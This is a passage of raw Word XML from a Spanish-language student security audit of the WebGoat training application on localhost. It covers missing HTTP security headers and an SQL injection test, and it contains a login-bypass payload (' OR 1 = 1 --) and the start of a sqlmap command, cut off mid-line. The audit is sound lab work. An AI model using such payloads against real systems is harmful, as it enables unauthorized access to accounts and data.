          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Nos resalta algunos problemas de configuración de seguridad relacionados con los encabezados </w:t>
      </w:r>
      <w:r w:rsidR="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP en el servidor que se está corriendo en </w:t>
      </w:r>
      <w:r w:rsidR="00A11BF3" w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidR="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9CF230" w14:textId="02040564" w:rsidR="00A11BF3" w:rsidRDefault="00A11BF3" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F4F7AA8" w14:textId="32126656" w:rsidR="00A11BF3" w:rsidRDefault="00A11BF3" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La ausencia del encabezado X-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Frame</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Options</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> permite que el sitio sea vulnerable a ataques de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Clickjacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10670275" w14:textId="7DFF03FF" w:rsidR="00A11BF3" w:rsidRPr="00A11BF3" w:rsidRDefault="00A11BF3" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La ausencia del encabezado X-Content-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Options</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> puede permitir que navegadores intenten interpretar el contenido en un formato distinto al especificado por el servidor, abriendo la puerta a ataques como </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">MIME </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sniffing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A11BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CBE46C" w14:textId="6393DDC9" w:rsidR="00A11BF3" w:rsidRDefault="00A11BF3" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB04E86" w14:textId="11215552" w:rsidR="00A11BF3" w:rsidRDefault="00A11BF3" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CF7E41B" wp14:editId="2A2017B4">
            <wp:extent cx="5612130" cy="257302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573020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D2DA25" w14:textId="77777777" w:rsidR="00A8151B" w:rsidRDefault="00A8151B" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1018CE05" w14:textId="4FE58EF5" w:rsidR="000E209E" w:rsidRPr="00A8151B" w:rsidRDefault="000E209E" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A8151B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>VULNERABILIDADES IDENTIFICADAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F95825" w14:textId="43DE0474" w:rsidR="000E209E" w:rsidRDefault="000E209E" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E6E900" w14:textId="44504E52" w:rsidR="001A0E00" w:rsidRDefault="00847FD8" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Durante la </w:t>
      </w:r>
      <w:r w:rsidR="004D766B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>auditoría</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A0E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">realizada a WebGoat, se </w:t>
      </w:r>
      <w:r w:rsidR="004D766B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>identificaron</w:t>
      </w:r>
      <w:r w:rsidR="001A0E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> varias vulnerabilidades que reflejan configuraciones faltantes de seguridad comunes en aplicaciones web. Estas fallas no solo exponen el sistema a posibles ataques, sino que también sirven como ejemplo para comprender como prevenir y mitigar riesgos en entornos reales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409C9594" w14:textId="77777777" w:rsidR="001A0E00" w:rsidRDefault="001A0E00" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DBEC1B7" w14:textId="4A63617B" w:rsidR="005F2C13" w:rsidRDefault="001A0E00" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación, presentare las vulnerabilidades detectadas acompañadas de evidencias especificas obtenidas durante el análisis y recomendaciones para abordar cada caso. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179FF690" w14:textId="6EC2C09C" w:rsidR="005F2C13" w:rsidRDefault="005F2C13" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406419C2" w14:textId="5B3CEF55" w:rsidR="005F2C13" w:rsidRDefault="005F2C13" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB67123" w14:textId="06898B10" w:rsidR="005F2C13" w:rsidRPr="00E562D3" w:rsidRDefault="00434863" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A3 </w:t>
      </w:r>
      <w:r w:rsidR="000A7260" w:rsidRPr="00E562D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Inyección SQL (SQL Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D88758" w14:textId="1F4CBC34" w:rsidR="000A7260" w:rsidRDefault="000A7260" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DDCD4C8" w14:textId="04D86E5A" w:rsidR="00300F0A" w:rsidRDefault="00300F0A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La inyección SQL ocurre cuando una aplicación permite a un atacante manipular consultas SQL ejecutadas en la base de datos mediante entradas no validadas, este fallo puede comprometer datos confidenciales, modificar información o incluso en algunos casos otorgar acceso total al sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0E330E" w14:textId="01C9A16B" w:rsidR="00300F0A" w:rsidRDefault="00300F0A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F4226C4" w14:textId="270EF856" w:rsidR="00300F0A" w:rsidRDefault="00300F0A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prueba #1 realizada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55623366" w14:textId="335AB7AE" w:rsidR="00300F0A" w:rsidRDefault="00300F0A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A457011" w14:textId="3CE5D8DD" w:rsidR="00300F0A" w:rsidRDefault="00300F0A" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ingresé la cadena maliciosa (‘OR 1 = 1 --) en el campo de inicio de sesión sin ingresar una contraseña valida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD7D76" w14:textId="630FDE75" w:rsidR="00300F0A" w:rsidRDefault="00300F0A" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El servidor respondió con acceso permitido, demostrando que la consulta SQL fue manipulada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D611C8" w14:textId="23DD9041" w:rsidR="00300F0A" w:rsidRDefault="00300F0A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3031C42D" wp14:editId="6BF151D7">
            <wp:extent cx="5612130" cy="311086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10865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3A4DD3" w14:textId="0459CB3B" w:rsidR="00300F0A" w:rsidRDefault="00300F0A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37997AA6" wp14:editId="5DC59CC3">
            <wp:extent cx="5612130" cy="1803400"/>
            <wp:effectExtent l="0" t="0" r="762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803400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D65950" w14:textId="55C1B72F" w:rsidR="00300F0A" w:rsidRDefault="00300F0A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A1F92F4" w14:textId="760C51C2" w:rsidR="00300F0A" w:rsidRDefault="00300F0A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prueba #2 realizada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A96F0B" w14:textId="6C15E4AA" w:rsidR="00300F0A" w:rsidRDefault="00300F0A" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="165A3F56" w14:textId="67D521A7" w:rsidR="00934311" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ingrese los siguientes comandos en la terminal de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux, y utilice la herramienta Burp Suite con el fin de adquirir más información y fallos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF24EA3" w14:textId="6E82D2EE" w:rsidR="00300F0A" w:rsidRDefault="00934311" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://localhost:9090/app/usersearch --data="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00934311">
        <w:rPr>
